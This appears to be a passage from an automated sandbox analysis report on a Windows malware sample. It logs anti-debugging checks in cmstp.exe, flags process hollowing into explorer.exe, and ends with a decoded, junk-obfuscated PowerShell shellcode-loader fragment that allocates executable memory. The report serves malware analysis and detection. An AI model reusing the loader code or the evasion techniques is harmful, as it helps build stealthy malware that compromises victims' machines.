      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A05AC mov eax, dword ptr fs:[00000030h]27_2_048A05AC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A05AC mov eax, dword ptr fs:[00000030h]27_2_048A05AC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F7D50 mov eax, dword ptr fs:[00000030h]27_2_047F7D50
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04801DB5 mov eax, dword ptr fs:[00000030h]27_2_04801DB5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04801DB5 mov eax, dword ptr fs:[00000030h]27_2_04801DB5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04801DB5 mov eax, dword ptr fs:[00000030h]27_2_04801DB5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E3D34 mov eax, dword ptr fs:[00000030h]27_2_047E3D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h]27_2_04856DC9
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h]27_2_04856DC9
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h]27_2_04856DC9
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04856DC9 mov ecx, dword ptr fs:[00000030h]27_2_04856DC9
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h]27_2_04856DC9
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04856DC9 mov eax, dword ptr fs:[00000030h]27_2_04856DC9
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DAD30 mov eax, dword ptr fs:[00000030h]27_2_047DAD30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h]27_2_0489FDE2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h]27_2_0489FDE2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h]27_2_0489FDE2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489FDE2 mov eax, dword ptr fs:[00000030h]27_2_0489FDE2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04888DF1 mov eax, dword ptr fs:[00000030h]27_2_04888DF1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047ED5E0 mov eax, dword ptr fs:[00000030h]27_2_047ED5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047ED5E0 mov eax, dword ptr fs:[00000030h]27_2_047ED5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489E539 mov eax, dword ptr fs:[00000030h]27_2_0489E539
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0485A537 mov eax, dword ptr fs:[00000030h]27_2_0485A537
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04804D3B mov eax, dword ptr fs:[00000030h]27_2_04804D3B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04804D3B mov eax, dword ptr fs:[00000030h]27_2_04804D3B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04804D3B mov eax, dword ptr fs:[00000030h]27_2_04804D3B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A8D34 mov eax, dword ptr fs:[00000030h]27_2_048A8D34
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04813D43 mov eax, dword ptr fs:[00000030h]27_2_04813D43
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04853540 mov eax, dword ptr fs:[00000030h]27_2_04853540
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04883D40 mov eax, dword ptr fs:[00000030h]27_2_04883D40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h]27_2_047D2D8A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h]27_2_047D2D8A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h]27_2_047D2D8A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h]27_2_047D2D8A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D2D8A mov eax, dword ptr fs:[00000030h]27_2_047D2D8A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486FE87 mov eax, dword ptr fs:[00000030h]27_2_0486FE87
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h]27_2_047FAE73
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h]27_2_047FAE73
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h]27_2_047FAE73
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h]27_2_047FAE73
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAE73 mov eax, dword ptr fs:[00000030h]27_2_047FAE73
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E766D mov eax, dword ptr fs:[00000030h]27_2_047E766D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048546A7 mov eax, dword ptr fs:[00000030h]27_2_048546A7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A0EA5 mov eax, dword ptr fs:[00000030h]27_2_048A0EA5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A0EA5 mov eax, dword ptr fs:[00000030h]27_2_048A0EA5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A0EA5 mov eax, dword ptr fs:[00000030h]27_2_048A0EA5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h]27_2_047E7E41
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h]27_2_047E7E41
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h]27_2_047E7E41
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h]27_2_047E7E41
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h]27_2_047E7E41
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E7E41 mov eax, dword ptr fs:[00000030h]27_2_047E7E41
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04818EC7 mov eax, dword ptr fs:[00000030h]27_2_04818EC7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0488FEC0 mov eax, dword ptr fs:[00000030h]27_2_0488FEC0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048036CC mov eax, dword ptr fs:[00000030h]27_2_048036CC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A8ED6 mov eax, dword ptr fs:[00000030h]27_2_048A8ED6
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DE620 mov eax, dword ptr fs:[00000030h]27_2_047DE620
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048016E0 mov ecx, dword ptr fs:[00000030h]27_2_048016E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h]27_2_047DC600
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h]27_2_047DC600
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h]27_2_047DC600
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04808E00 mov eax, dword ptr fs:[00000030h]27_2_04808E00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04891608 mov eax, dword ptr fs:[00000030h]27_2_04891608
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E76E2 mov eax, dword ptr fs:[00000030h]27_2_047E76E2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A61C mov eax, dword ptr fs:[00000030h]27_2_0480A61C
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A61C mov eax, dword ptr fs:[00000030h]27_2_0480A61C
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0488FE3F mov eax, dword ptr fs:[00000030h]27_2_0488FE3F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489AE44 mov eax, dword ptr fs:[00000030h]27_2_0489AE44
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489AE44 mov eax, dword ptr fs:[00000030h]27_2_0489AE44
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857794 mov eax, dword ptr fs:[00000030h]27_2_04857794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857794 mov eax, dword ptr fs:[00000030h]27_2_04857794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857794 mov eax, dword ptr fs:[00000030h]27_2_04857794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EFF60 mov eax, dword ptr fs:[00000030h]27_2_047EFF60
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EEF40 mov eax, dword ptr fs:[00000030h]27_2_047EEF40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D4F2E mov eax, dword ptr fs:[00000030h]27_2_047D4F2E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D4F2E mov eax, dword ptr fs:[00000030h]27_2_047D4F2E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FF716 mov eax, dword ptr fs:[00000030h]27_2_047FF716
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048137F5 mov eax, dword ptr fs:[00000030h]27_2_048137F5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A070D mov eax, dword ptr fs:[00000030h]27_2_048A070D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A070D mov eax, dword ptr fs:[00000030h]27_2_048A070D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A70E mov eax, dword ptr fs:[00000030h]27_2_0480A70E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A70E mov eax, dword ptr fs:[00000030h]27_2_0480A70E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486FF10 mov eax, dword ptr fs:[00000030h]27_2_0486FF10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486FF10 mov eax, dword ptr fs:[00000030h]27_2_0486FF10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480E730 mov eax, dword ptr fs:[00000030h]27_2_0480E730
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A8F6A mov eax, dword ptr fs:[00000030h]27_2_048A8F6A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E8794 mov eax, dword ptr fs:[00000030h]27_2_047E8794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04853884 mov eax, dword ptr fs:[00000030h]27_2_04853884
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04853884 mov eax, dword ptr fs:[00000030h]27_2_04853884
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048190AF mov eax, dword ptr fs:[00000030h]27_2_048190AF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F0050 mov eax, dword ptr fs:[00000030h]27_2_047F0050
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F0050 mov eax, dword ptr fs:[00000030h]27_2_047F0050
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480F0BF mov ecx, dword ptr fs:[00000030h]27_2_0480F0BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480F0BF mov eax, dword ptr fs:[00000030h]27_2_0480F0BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480F0BF mov eax, dword ptr fs:[00000030h]27_2_0480F0BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov ecx, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D58EC mov eax, dword ptr fs:[00000030h]27_2_047D58EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857016 mov eax, dword ptr fs:[00000030h]27_2_04857016
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857016 mov eax, dword ptr fs:[00000030h]27_2_04857016
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857016 mov eax, dword ptr fs:[00000030h]27_2_04857016
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h]27_2_047D40E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h]27_2_047D40E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h]27_2_047D40E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A4015 mov eax, dword ptr fs:[00000030h]27_2_048A4015
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A4015 mov eax, dword ptr fs:[00000030h]27_2_048A4015
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04892073 mov eax, dword ptr fs:[00000030h]27_2_04892073
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9080 mov eax, dword ptr fs:[00000030h]27_2_047D9080
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1074 mov eax, dword ptr fs:[00000030h]27_2_048A1074
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A185 mov eax, dword ptr fs:[00000030h]27_2_0480A185
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB171 mov eax, dword ptr fs:[00000030h]27_2_047DB171
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB171 mov eax, dword ptr fs:[00000030h]27_2_047DB171
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04802990 mov eax, dword ptr fs:[00000030h]27_2_04802990
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC962 mov eax, dword ptr fs:[00000030h]27_2_047DC962
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048061A0 mov eax, dword ptr fs:[00000030h]27_2_048061A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048061A0 mov eax, dword ptr fs:[00000030h]27_2_048061A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048569A6 mov eax, dword ptr fs:[00000030h]27_2_048569A6
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FB944 mov eax, dword ptr fs:[00000030h]27_2_047FB944
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FB944 mov eax, dword ptr fs:[00000030h]27_2_047FB944
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov ecx, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048641E8 mov eax, dword ptr fs:[00000030h]27_2_048641E8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h]27_2_047D9100
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h]27_2_047D9100
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h]27_2_047D9100
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h]27_2_047DB1E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h]27_2_047DB1E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h]27_2_047DB1E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480513A mov eax, dword ptr fs:[00000030h]27_2_0480513A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480513A mov eax, dword ptr fs:[00000030h]27_2_0480513A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FC182 mov eax, dword ptr fs:[00000030h]27_2_047FC182
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480D294 mov eax, dword ptr fs:[00000030h]27_2_0480D294
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480D294 mov eax, dword ptr fs:[00000030h]27_2_0480D294
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480FAB0 mov eax, dword ptr fs:[00000030h]27_2_0480FAB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04802ACB mov eax, dword ptr fs:[00000030h]27_2_04802ACB
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_1ED496E0

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Sample uses process hollowing techniqueShow sources
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: EB0000Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Encrypted powershell cmdline option foundShow sources
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Rven PAPAP sawbellyun Ricardt5 OKSBONNETL SCIE chinantas Nons Osamine Battalia2 Hovedp4 professi nanakol ensilerekl Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class bidrags1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);}"@#Berigning balust Fjert Splintri7 Melanists VICEUDENRI nettovrd MAGSVEJRCL Mirkosu Cockfighta coppere OPELSK BJRNEUN Hagedesm7 farr Test-Path "objekt" Test-Path "FOLKE" $bidrags3=0;$bidrags9=1048576;$bidrags8=[bidrags1]::NtAllocateVirtualMemory(-1,[ref]$bidrags3,0,[ref]$bidrags9,12288,64)#Socialdem7 SCALD Boggles sikh Oliske Sjuskemal6 investm Elit9 MULTIFACTO Frugal Brnepsy Express Frde CORRODER FRONT fittilyske Epipl Purvey mundsk Stude4 selska komp kbesumsan Autotomicf TRAI lancew Trans Biorytme 